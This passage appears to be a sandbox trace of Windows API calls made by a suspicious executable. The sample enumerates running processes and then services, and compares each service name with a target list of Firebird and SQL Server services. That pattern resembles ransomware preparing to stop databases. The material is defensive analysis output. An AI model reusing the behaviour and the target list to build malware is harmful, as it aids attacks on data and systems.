hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0187.915] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0187.915] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0187.916] lstrlenW (lpString="Memory Compression") returned 18 [0187.916] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0187.917] lstrlenW (lpString="sihost.exe") returned 10 [0187.917] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.918] lstrlenW (lpString="svchost.exe") returned 11 [0187.918] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0187.918] lstrlenW (lpString="msoia.exe") returned 9 [0187.918] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0187.919] lstrlenW (lpString="taskhostw.exe") returned 13 [0187.919] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.920] lstrlenW (lpString="explorer.exe") returned 12 [0187.920] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0187.920] lstrlenW (lpString="SearchUI.exe") returned 12 [0187.920] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0187.921] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0187.921] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0187.922] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0187.922] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.923] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0187.923] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0187.923] lstrlenW (lpString="hgaibc.exe") returned 10 [0187.923] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0187.924] CloseHandle (hObject=0x2f0) returned 1 [0187.924] Sleep (dwMilliseconds=0x1f4) [0188.439] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bee08 [0188.440] EnumServicesStatusExW (in: hSCManager=0x6bee08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0188.440] GetLastError () returned 0xea [0188.440] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d87a0 [0188.441] EnumServicesStatusExW (in: hSCManager=0x6bee08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d87a0, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d87a0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0188.441] CloseServiceHandle (hSCObject=0x6bee08) returned 1 [0188.442] lstrlenW (lpString="Appinfo") returned 7 [0188.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0188.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0188.442] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0188.442] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0188.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0188.442] lstrlenW (lpString="AppXSvc") returned 7 [0188.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0188.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0188.442] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0188.442] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0188.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0188.442] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0188.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0188.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0188.442] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0188.442] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0188.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0188.442] lstrlenW (lpString="Audiosrv") returned 8 [0188.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0188.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0188.442] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0188.443] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0188.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0188.443] lstrlenW (lpString="BFE") returned 3 [0188.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0188.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0188.443] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0188.443] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0188.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0188.443] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0188.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0188.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0188.443] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0188.443] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0188.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0188.443] lstrlenW (lpString="CDPSvc") returned 6 [0188.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0188.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0188.443] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0188.443] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0188.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0188.443] lstrlenW (lpString="ClickToRunSvc") returned 13 [0188.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0188.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0188.443] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0188.443] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0188.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0188.443] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0188.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0188.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0188.444] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0188.444] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0188.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0188.444] lstrlenW (lpString="CryptSvc") returned 8 [0188.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0188.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0188.444] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0188.444] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0188.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0188.444] lstrlenW (lpString="DcomLaunch") returned 10 [0188.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0188.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0188.444] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0188.444] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0188.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0188.444] lstrlenW (lpString="DeviceAssociationService") returned 24 [0188.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0188.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0188.444] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0188.444] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0188.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0188.444] lstrlenW (lpString="Dhcp") returned 4 [0188.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0188.444] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0188.444] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0188.444] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0188.444] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0188.444] lstrlenW (lpString="Dnscache") returned 8 [0188.444] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0188.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0188.445] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0188.445] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0188.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0188.445] lstrlenW (lpString="DPS") returned 3 [0188.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0188.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0188.445] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0188.445] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0188.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0188.445] lstrlenW (lpString="DusmSvc") returned 7 [0188.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0188.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0188.445] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0188.445] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0188.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0188.445] lstrlenW (lpString="EventLog") returned 8 [0188.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0188.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0188.445] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0188.445] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0188.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0188.445] lstrlenW (lpString="EventSystem") returned 11 [0188.445] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0188.445] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0188.445] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0188.445] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0188.445] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0188.446] lstrlenW (lpString="FontCache") returned 9 [0188.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0188.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0188.446] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0188.446] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0188.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0188.446] lstrlenW (lpString="gpsvc") returned 5 [0188.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0188.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0188.446] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0188.446] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0188.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0188.446] lstrlenW (lpString="iphlpsvc") returned 8 [0188.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0188.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0188.446] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0188.446] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0188.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0188.446] lstrlenW (lpString="KeyIso") returned 6 [0188.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0188.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0188.446] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0188.446] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0188.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0188.446] lstrlenW (lpString="LanmanServer") returned 12 [0188.446] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0188.446] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0188.446] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0188.446] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0188.446] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0188.447] lstrlenW (lpString="LanmanWorkstation") returned 17 [0188.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0188.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0188.447] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0188.447] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0188.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0188.447] lstrlenW (lpString="lfsvc") returned 5 [0188.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0188.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0188.447] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0188.447] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0188.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0188.447] lstrlenW (lpString="lmhosts") returned 7 [0188.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0188.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0188.447] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0188.447] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0188.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0188.447] lstrlenW (lpString="LSM") returned 3 [0188.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0188.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0188.447] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0188.447] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0188.447] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0188.447] lstrlenW (lpString="MpsSvc") returned 6 [0188.447] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0188.447] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0188.447] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0188.447] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0188.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0188.448] lstrlenW (lpString="NcbService") returned 10 [0188.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0188.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0188.448] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0188.448] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0188.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0188.448] lstrlenW (lpString="netprofm") returned 8 [0188.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0188.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0188.448] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0188.448] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0188.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0188.448] lstrlenW (lpString="NgcSvc") returned 6 [0188.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0188.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0188.448] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0188.448] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0188.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0188.448] lstrlenW (lpString="NlaSvc") returned 6 [0188.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0188.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0188.448] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0188.448] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0188.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0188.448] lstrlenW (lpString="nsi") returned 3 [0188.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0188.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0188.449] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0188.449] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0188.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0188.449] lstrlenW (lpString="PcaSvc") returned 6 [0188.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0188.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0188.449] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0188.449] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0188.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0188.449] lstrlenW (lpString="PlugPlay") returned 8 [0188.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0188.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0188.449] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0188.449] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0188.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0188.449] lstrlenW (lpString="Power") returned 5 [0188.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0188.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0188.449] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0188.449] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0188.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0188.449] lstrlenW (lpString="ProfSvc") returned 7 [0188.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0188.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0188.449] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0188.449] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0188.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0188.449] lstrlenW (lpString="RpcEptMapper") returned 12 [0188.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0188.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0188.450] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0188.450] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0188.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0188.450] lstrlenW (lpString="RpcSs") returned 5 [0188.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0188.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0188.450] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0188.450] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0188.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0188.450] lstrlenW (lpString="SamSs") returned 5 [0188.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0188.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0188.450] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0188.450] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0188.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0188.450] lstrlenW (lpString="Schedule") returned 8 [0188.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0188.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0188.450] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0188.450] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0188.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0188.450] lstrlenW (lpString="SecurityHealthService") returned 21 [0188.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0188.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0188.450] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0188.450] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0188.451] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0188.451] lstrlenW (lpString="SENS") returned 4 [0188.451] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0188.451] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0188.451] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0188.451] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0188.451] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0188.451] lstrlenW (lpString="ShellHWDetection") returned 16 [0188.451] lstrcmpiW 